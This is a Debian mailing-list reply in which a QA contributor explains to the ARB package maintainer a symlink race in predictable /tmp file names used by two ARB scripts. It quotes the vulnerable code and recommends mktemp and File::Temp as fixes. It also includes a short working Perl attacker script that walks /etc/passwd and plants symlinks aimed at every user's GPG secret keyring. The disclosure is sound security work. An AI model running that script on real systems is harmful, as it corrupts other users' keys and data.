On 08:36 Mon 22 Sep , Andreas Tille wrote: > Hi, > unfortunately I completely missed this bug because I had a "relaxing from > DebConf" vacation and it must somehow vanished from my mailbox - so sorry > for caring so late.
> Now I had a look at Arb packaging and have to admit I do not really > understand which issue exactly fullfills the symlink attack problem. > Could you please be a little bit more specific (provide the output of > the script for arb) to enable us to fix this problem quickly? > Kind regards and thanks for your QA work look at full report: http://uvw.ru/report.lenny.txt if attacker creates symlink /tmp/arb_fdnaml_${USER}_$$ or /tmp/arbdsmz.html then starting scripts /usr/lib/arb/SH/arb_fastdnaml or /usr/lib/arb/SH/dszmconnect.pl will lead to data corrupt. example for attacker script: #!/usr/bin/perl symlink '/tmp/arbdsmz.html', '/path/to/file'; for my $user ( map { chomp; $_=[split ':', $_]; [$_->[0], $_->[5]] } `cat /etc/passwd` ) { symlink "$$user[1]/.gnupg/secring.gpg", "/tmp/arb_fdnaml_$$user[0]_$_" for ($$ .. $$+1000000); } use mktemp (1) (with option -t) for create temp-files in bash-scripts. use File::Temp module for create temp files in perl-scripts. cut of report: Package: arb-common Version: 0.0.20071207.1-4 Filename: pool/non-free/a/arb/arb-common_0.0.20071207.1-4_all.deb Found error in /usr/lib/arb/SH/arb_fastdnaml: $ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/arb_fastdnaml #!/bin/sh tmp=/tmp/arb_fdnaml_${USER}_$$ mv infile $tmp nice -19 $1 < $tmp & sig=$! /bin/echo "$sig $$ \c" >>/tmp/arb_pids_${USER}_${ARB_PID} wait # echo $tmp not deleted for debugging purposes rm -f $tmp rm -f checkpoint.$sig mv treefile.$sig treefile Found error in /usr/lib/arb/SH/dszmconnect.pl: $ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/dszmconnect.pl </body> </html>"; open (OUTPUT , "> /tmp/arbdsmz.html") or die "cannot open input file /tmp/arbdsmz.html"; if (scalar(@ARGV) == 0) {print OUTPUT $errordocument; die("no search items given ! Give at least one item!");} ##print length(@ARGV)."\n"; -- my $selection_content = 'VAR_DATABASE=bact&VAR_HITS=25&VAR_DSMZITEM='."$item1".'&VAR_DSMZITEM2='."$item2".'&B1=Search'; $req_selection->content($selection_content); # Pass request to the user agent and get a response back my $res_selection = $ua_selection -> request($req_selection, '/tmp/arbdsmz.htm'); # Check the outcome of the response if ($res_selection->is_success) {print $res_selection->content;} else {die "Bad luck this time, request failed\n";}; open (INPUT , "< /tmp/arbdsmz.htm") or die "cannot open input file /tmp/arbdsmz.htm"; my $htmlcontent; { local $/; -- $htmlcontent =~ s{HREF="}{HREF="http://www.dsmz.de}igm; $htmlcontent =~ s{HREF=[^"]}{HREF=http://www.dsmz.de/}igm; ##" print OUTPUT $htmlcontent ; #exec ('netscape', '/tmp/arbdsmz.html'); print "file:///tmp/arbdsmz.html"; ##print "$htmlcontent\n"; -- . ''`. Dmitry E. Oboukhov : :’ : [EMAIL PROTECTED] `. `~’ GPGKey: 1024D / F8E26537 2006-11-21 `- 1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
signature.asc
Description: Digital signature